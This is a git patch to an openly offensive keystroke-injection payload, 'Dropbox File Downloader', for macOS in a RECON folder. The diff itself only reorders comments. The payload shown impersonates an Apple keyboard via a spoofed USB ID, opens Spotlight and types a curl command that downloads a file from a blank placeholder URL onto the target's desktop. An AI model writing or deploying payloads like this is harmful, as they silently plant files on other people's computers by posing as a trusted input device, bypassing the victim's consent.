From a74661510e0aeb191f60acdca4ce1359eec5ab47 Mon Sep 17 00:00:00 2001 From: Narsty Date: Sun, 4 Jun 2023 19:18:40 -0500 Subject: [PATCH] Dropbox File Downloader.txt --- RECON/Dropbox File Downloader.txt | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/RECON/Dropbox File Downloader.txt b/RECON/Dropbox File Downloader.txt index 9862da7..e347559 100644 --- a/RECON/Dropbox File Downloader.txt +++ b/RECON/Dropbox File Downloader.txt @@ -1,11 +1,14 @@ -REM Author: Narsty -REM Title: Dropbox File Downloader -REM Version 1.0 MacOs - REM Replace with the actual URL for the file you want to download. REM Additionally, replace filename with the desired name and extension for the downloaded file. REM the script will download a file to the target MacOs desktop + + +REM Author: Narsty +REM Title: Dropbox File Downloader +REM Version 1.0 MacOs +REM Category: Recon + ID 05ac:021e Apple:Keyboard DELAY 500 GUI SPACE @@ -18,4 +21,4 @@ STRING curl -L -o ~/Desktop/ "" DELAY 500 ENTER DELAY 5000 -ENTER \ No newline at end of file +ENTER